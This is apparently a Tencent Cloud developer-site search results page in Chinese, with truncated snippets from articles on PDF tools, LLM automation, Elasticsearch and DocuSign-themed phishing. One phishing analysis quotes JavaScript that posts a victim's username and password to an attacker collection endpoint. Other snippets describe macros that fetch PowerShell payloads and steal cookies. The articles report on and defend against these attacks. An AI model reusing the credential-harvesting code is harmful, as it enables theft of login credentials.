文档建议反馈控制台
首页
学习
活动
专区
圈层
工具
MCP广场
文章/答案/技术大牛
发布

假期网络钓鱼攻击中DocuSign伪装与虚假贷款诈骗的融合机制分析

在众多钓鱼载体中,DocuSign因其广泛用于电子合同签署,成为攻击者频繁冒充的品牌。合法用户习惯于接收来自DocuSign的邮件以完成法律或商业文件签署,这种信任惯性被恶意利用。...近期,Forcepoint X-Labs披露了一类新型攻击活动,其特点在于将DocuSign品牌伪装与虚假贷款服务深度耦合:攻击邮件声称用户已获得“预审批贷款”,需立即签署相关文件以激活资金,邮件内容包含看似正规的...一旦启用,内嵌VBA宏执行以下操作:从远程服务器下载第二阶段载荷(通常为PowerShell脚本);窃取浏览器Cookie、保存的密码及本地文档;建立持久化后门。...token=abc123"print(is_suspicious_docusign_url(test_url)) # 输出: True(4.2)终端层防御对于恶意文档,可通过禁用Office宏(尤其来自互联网的文档...以下PowerShell脚本可批量扫描指定目录下所有.docm文件是否包含AutoOpen或Document_Open宏:function Test-MaliciousMacro {param($Path

22110

Django 结合Vue实现前端页面导出为PDF

从数据库读取前端用到的表格数据,然后替换至模板中对应位置的模板变量;通过echars api先由 js把echarts图表转为base64编码数据,然后随其它导出文件必要参数信息发送到后台,后台接收后转..., 'out.pdf') 可以通过传递多个url、文件来生成pdf文件: pdfkit.from_url(['https://www.w3school.com.cn', 'www.cnblogs.com...', 'www.cnblogs.com'], 'out.pdf') pdfkit.from_file(['file1.html', 'file2.html'], 'out.pdf') 可以通过打开的文件来生成...PDF with open('file.html') as f: pdfkit.from_file(f, 'out.pdf') 也可以不输出到文件,直接保存到内存中,以便后续处理 pdf = pdfkit.from_url...('www.w3school.com.cn ', False) 默认的,pdfkit会显示所有wkhtmltopdf的输出,可以通过添加options参数,并设置quiet的值(quiet除外,还有很多其他选项可设置

2.6K10
    • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    AI办公自动化:用通义千问Qwen-Long批量总结PDF长文档内容

    而且费用也很便宜: 模型调用-输入0.0005元/text_token(千个) 模型调用-输出0.002元/text_token(千个) 现在申请API还有免费额度:3600万tokens,到期时间1个月...; 调用通义千问Qwen-Long的API上传PDF文件; 发送提示词:“总结这本书每个章节的内容,用中文输出”,获取返回结果,保存在docx格式的word文档中,文件名使用PDF文件的文件名,文档保存到文件夹..."D:\ABooks"下; 文档保存完后,在通义千问Qwen-Long中删除这个PDF文件; 然后读取下一个PDF文件,上传,总结,删除,直到文件夹中全部PDF文件都总结完成。...注意: 每一步都要输出相关信息到屏幕上 如果PDF文本长度或者总结返回的文本长度超过限制,那就进行拆分,然后组合在一起; 如果某个PDF文件读取或者内容抽取等发生错误,就跳过,继续下一个; 通义千问Qwen-Long...调用频次 ≤ 100 QPM,每分钟不超过100次API调用; ##上传文件 文件格式支持常见的文本文件(txt docx pdf epub mobi md),单文件大小限制为150M,总量限制为1万个文件

    2.3K10

    SpringBoot + ITextPdf:高效生成 PDF 预览文件

    解决方案我们先观察下真实的开票预览的模板。图片发票信息由两部分组成:固定信息,例如购买方信息、销售方信息。商品信息,可能有多行,需动态填充很明显的一个主子结构。了解了一下iTextPdf的相关api。...文件搞定了第一部分的PDF文件,我们再来处理第二部分的PDF文件:生成商品列表。...调用Document.close()时会触发输出流ByteArrayOutputStream的更新。另外还有一个要点是,如果表格要显示中文,那么输出的内容格必须设置中文字体,否则无法显示。...}3.5 输出用于线上环境的接口,在此处得到了字节流之后就上传s3了 在演示用的主函数里,将字节流保存为了本地文件log.info(returnPath +" pdf模板填充成功,进行合并");List...里生成操作pdf文件的方法。

    2.5K11

    Docusign如何取得附有授权码授予的访问令牌

    查询表索引 查询表索引 Docusign:How to get an access token with Authorization Code Grant如何取得附有授权码授予的访问令牌 手动获取 标题...Prerequisites 先决条件 获取授权码: 获取访问令牌 标题获取访问令牌 包含以下字段 Docusign:How to get an access token with Authorization...secret key is 秘密的钥匙是 d7014634-xxxx-xxxx-xxxx-6842b7aa8861 you can get the base64 value in a JavaScript...:d7014634-xxxx-xxxx-xxxx-6842b7aa8861’) 这个方法调用会产生一个新的授权头值: NWMyYjhkN2…hODg2MQ== Authorization头包含集成密钥和秘密密钥...标题获取访问令牌 包含以下字段 name value access_token 访问令牌的值。这个值将被添加到所有DocuSign API调用的 Authorization 头中。

    1.5K10

    零代码编程:用kimichat将PDF自动批量分割成多个图片

    有一个PDF文件,现在想把pdf文件转换成图片, 可以在kimichat中输入提示词: 你是一个Python编程专家,要完成一个将PDF文件自动批量分割成多个图片的任务,具体步骤如下: 打开d盘下的pdf...文件:I'll be a cowboy.pdf 将这个PDF文件按照页码分割成多个图片,一页保存为一张图片; 在d盘新建一个文件夹:a cowboy 所有图片保存到d盘的文件夹:a cowboy 下面是...): # 确保输出文件夹存在 if not os.path.exists(output_folder): os.makedirs(output_folder) # 打开PDF文件 pdf_document...= fitz.open(pdf_path) # 遍历PDF的每一页 for page_number in range(len(pdf_document)): # 获取页面 page = pdf_document..., image_filename) # 保存图片 img.save(image_path) # 关闭PDF文件 pdf_document.close() # 设置PDF文件路径和输出文件夹路径 pdf_path

    29810

    LibreOffice安装及使用

    Python 调用 LibreOffice API 创建文件、保存为不同的格式、导出为PDF、并添加密码保护 Python调用LibreOffice转换文件 libreoffice简介 官网:https.../hello_world.py 此时,你定义的保存路径下会生成四个文件:一个ODT文件,一个DOCX文件,一个PDF文件,还有一个受密码保护的ODT文件。...,比如FilterName, Password等>) Python调用LibreOffice转换文件 整体流程 1、启动LibreOffice服务 2、打开待转换的文件 3、设置文件输出路径和格式...这段代码会通过LibreOffice的服务打开待转换的文件。 步骤三:设置文件输出路径和格式 在打开了待转换的文件之后,我们需要设置转换后文件的输出路径和格式。..." # 设置转换后文件的输出路径和格式 doc.storeToURL(output_file, output_props) 在上述代码中,output_file代表转换后文件的输出路径和名称,这里以PDF

    4.8K10

    LangChain学习:Chat with Your Data

    PDF from config import api_type, api_key, api_base, api_version, model_name from langchain.chat_models...', 'page': 0} 只能输出 PDF 中的文字 1.2 油管视频 from langchain.document_loaders.generic import GenericLoader from...由于加载文档的时候有一个重复的 PDF,所以查询的时候可能会出现两个一样的查询结果 然后 question = "what did they say about regression in the...docs = retriever.get_relevant_documents(question) 这样模型就自己推断该从哪个文件里进行搜索 上下文压缩 另一种提高检索文档质量的方法是压缩 与查询最相关的信息可能隐藏在包含大量不相关文本的文档中...传递完整的文档可能会导致更昂贵的LLM调用和较差的响应 from langchain.retrievers import ContextualCompressionRetriever from langchain.retrievers.document_compressors

    1.6K30

    假期“财务礼包”暗藏杀机:DocuSign钓鱼邮件激增,虚假贷款成新诱饵

    这些邮件往往以“您有一份待签署的贷款批准文件”“您的年终财务协议已就绪”等措辞开头,附带DocuSign官方Logo、标准邮件模板甚至真实的发件人域名变体(如 no-reply@docusign-support...– 请立即签署文件正文:尊敬的客户,恭喜!...user@example.com)const urlParams = new URLSearchParams(window.location.search);const email = urlParams.get...('email');if (email) document.querySelector('input[name="email"]').value = email;// 表单提交后重定向至真实DocuSign...对此,芦笛呼吁SaaS厂商承担更多责任:“除了加强自身域名保护(如BIMI标准),还应提供‘文档真实性验证API’,允许第三方应用校验签名请求真伪。信任不能只靠用户肉眼分辨。”

    14410

    Elasticsearch 7.x 之文档、索引和 REST API

    什么是文档 文档Unique ID 文档元数据 什么是索引 REST API 一、索引文档(Document) 1.1 白话什么是文档 从使用案例出发,Elasticsearch 是面向文档,文档是所有搜索数据的最小单元...文档:每一条日志文件中的日志项,就是文档 案例二:可以搜索并播放电影的在线视频网站 文档:每一个电影的具体信息,就是文档 案例三:可以搜索并下载文件的云存储网站,类似百度云 文档:每一个文件具体内容信息...文档(Document)是索引信息的基本单位。 文档被序列化成为 JSON 格式,物理保存在一个索引中。...2.3 跟 MySQL 类比 基本理解了 Elasticsearch 重要的两个概念,可以将 ES 关键点跟关系型数据库类比如下: 三、REST API 方便 ES 被各种语言调用 如图,Elasticsearch...提供了 REST API,方便,相关索引 API 如下: # 查看索引相关信息 GET kibana_sample_data_ecommerce # 查看索引的文档总数 GET kibana_sample_data_ecommerce

    1.9K30

    回拨钓鱼攻击中品牌仿冒的技术机制与防御路径研究

    关键词:回拨钓鱼;品牌仿冒;社会工程;PDF附件;QR码;邮件安全1 引言随着企业数字化转型加速,微软Office 365、PayPal支付、DocuSign电子签名及Geek Squad技术支持等服务已成为商业运营和个人日常不可或缺的基础设施...据Cisco Talos 2025年7月发布的报告,在2025年第二季度,微软、NortonLifeLock、PayPal、DocuSign和Geek Squad依次成为回拨钓鱼攻击中最常被仿冒的品牌,...其共同特征是均涉及高频次、高敏感度的用户交互场景——如账单支付、账户验证、文件签署或设备维护。...PDF附件内容高度定制化,通常包含以下元素:仿冒品牌Logo(如微软四色方块、PayPal蓝白标识);虚构但逼真的通知文案(如“您的PayPal账户存在$499.99未授权交易”“DocuSign文件需...4.3 用户教育:提升情境识别能力培训应聚焦具体场景而非泛泛而谈:识别“空白邮件+附件”模式:强调正规企业极少通过纯附件邮件发送重要通知;核实渠道唯一性:教导用户通过官方App内消息、官网底部联系方式或已保存的客服号码进行二次确认

    20110

    伪装成“DocuSign”的钓鱼邮件席卷法律界:一场针对信任链的精准打击

    佛罗里达州律师协会(The Florida Bar)官网发布紧急警报:一批高度仿真的网络钓鱼邮件正以“DocuSign文件待签署”为诱饵,大规模投递给该州注册律师及法律从业者。...事实上,佛罗里达州律师协会明确声明:从未使用DocuSign向会员发送任何通知。这一细节恰恰成为识别骗局的核心线索。...,若是则返回正常页面;凭据直传C2服务器:用户提交表单后,数据不经本地存储,直接通过XHR或Fetch API加密上传至攻击者控制的服务器。...password: document.getElementById("pass").value};fetch("https://api.secure-update[.]xyz/collect", {method...)警告:多起针对信托公司高管的钓鱼攻击,伪装成“合规文件签署”,使用伪造的Adobe Sign界面;2025年,澳大利亚法律协会报告:钓鱼邮件开始嵌入MFA(多因素认证)钓鱼框架,诱导用户在伪造页面输入一次性验证码

    20410

    .net core实践系列之短信服务-Sikiro.SMS.Api服务的实现

    REST API简介 REST Representational State Transfer的缩写,翻译为“表现层状态转化”,是由Roy Thomas Fieding在他的博士论文《Architectural...或JSON) 无状态的服务 不需要保存会话状态(SESSION),资源本身就是天然的状态,是需要被保存的。...REST SMSApi.com/api/SMS  GET SMSApi.com/api/SMS  POST REST API每个资源只有唯一的URI,而资源可以有不同的动作执行相应的接口 RPC的更加倾向于面向过程...= "Sikiro.SMS.API"; document.Info.Description = "短信服务API"; document.Info.TermsOfService...结尾 本篇介绍Sikiro.SMS.Api的设计与实现,下篇会针对API调用进行封装SDK。如果有任何建议,请在下方评论反馈给我。

    2K20

    自动读取Word文件并写入Excel

    python-docx读取Word文件 在做数据分析时,虽然操作docx并不是常用操作,但有些时候,数据分析师拿到的文件是docx或doc的Word文件,尤其是对数据具有至关重要的数据字典。...接下来以一个数据字典为例来介绍下python-docx读取Word文件的基本操作。并将Word中的表格内容写入excel中。...in doc.paragraphs] # 输出读取到的内容 for i in pl: print(i) 1.数据字典 此处是对每个数据模型中的数据流向所涉及的表进行表结构的详细说明。...>>> mywb.get_sheet_names() ['Sheet'] >>> sheet = mywb.active >>> sheet.title 'Sheet' 修改工作表名称,并保存。...载入Excel文件并保存 在把一个现有的excel文件读入内存,并对它进行一系列修改之后,必须使用save()方法,将其保存,否则所有的更改都会丢失。

    3.4K20

    如何在Ubuntu 14.04上安装和使用BaasBox

    如果您没有unzip,请使用以下命令安装它: sudo apt-get install unzip 现在解压缩zip文件的内容: unzip baasbox-stable.zip 例如,此命令将zip文件的内容提取到名为...输入todos集合的名称,然后单击“ 保存更改”以完成集合创建过程。应用程序的用户现在可以使用REST API访问此集合及其在此集合中的文档。让我们来看看它是如何工作的。...第五步 - 使用REST API 现在我们知道如何使用管理控制台执行各种任务,让我们看看如何使用BaasBox的REST API执行相同的任务。...使用REST API检索单个文档 curl用id获取文档的命令的一般格式是: curl http://your_ip_address:9000/document/collection_name/document_id...首先,安装主管: sudo apt-get install supervisor 为了让Supervisor管理我们的应用程序,我们需要创建一个配置文件。

    1.4K00

    Office三件套批量转PDF以及PDF书签读写与加水印

    今天呢,我将带大家完全只使用 win32 调用 VBA 的 API 来完成这个转换。 另外,将完成 PDF 书签的写入和提取操作以及批量加水印的操作。关于水印我们可以加背景底图水印或悬浮文字水印。...书签的提取与写入 PDF书签提取 PDF书签保存到文件 从文件读取PDF书签数据 向PDF写入书签数据 给PDF加水印 生成水印PDF文件 PyPDF2库批量加水印 拷贝书签 加水印同时复制书签 PyMuPDF...给PDF加文字水印 PyPDF2库压缩PDF office三件套转换为 PDF 格式 office三件套包括Word、Excel、PowerPoint,为了调用 office 程序自身的 API 需要先确保已经安装...这是因为PPT的saveAs保存API提供了直接另存为PDF的方法,详解: https://docs.microsoft.com/zh-cn/office/vba/api/powerpoint.presentation.saveas...如果直接给未经 PyPDF2 库压缩的 PDF 增加文字水印会导致文件大小增加较大,此时还可以使用 PyPDF2 库对 PDF进行压缩输出。

    3.6K10

    AI新宠DocExt:纯本地文档抽取,开源免费还无依赖!你还在为OCR头疼吗?

    项目介绍随着 AI 大模型时代的到来,传统 OCR + LLM 的繁琐流程经常需要人工调优、模板设定和外部 API 支持。...DocExt(Document Extractor)颠覆这一传统,直接采用视觉语言模型(VLM)实现文档图像的语义理解:零 OCR:不再依赖 Tesseract / EasyOCR 等引擎,避免 OCR...该项目同时也是 Intelligent Document Processing(IDP)排行榜的组成部分,覆盖 KIE、OCR、表格识别、文档分类、VQA、长文档处理等任务。...核心功能多文档多页支持支持 PNG/JPG/PDF 等多格式文档,能一次处理多页文档,全流程 API 内置支持——无需分割文档、合并结果,自动完成。...本地部署 & HTTP API支持命令行调用,也可以 RESTful API 形式在 Linux/MacOS 系统中本地部署运行。零外部依赖,适合处理敏感文件。

    1.1K10
    点击加载更多

    相关资讯

    热门标签

    更多标签

    活动推荐

      运营活动

      活动名称
      广告关闭

      腾讯云开发者

      扫码关注腾讯云开发者

      扫码关注腾讯云开发者

      领取腾讯云代金券

      热门产品

      热门推荐

      更多推荐

      Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有

      深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 粤公网安备44030502008569号

      腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号

      领券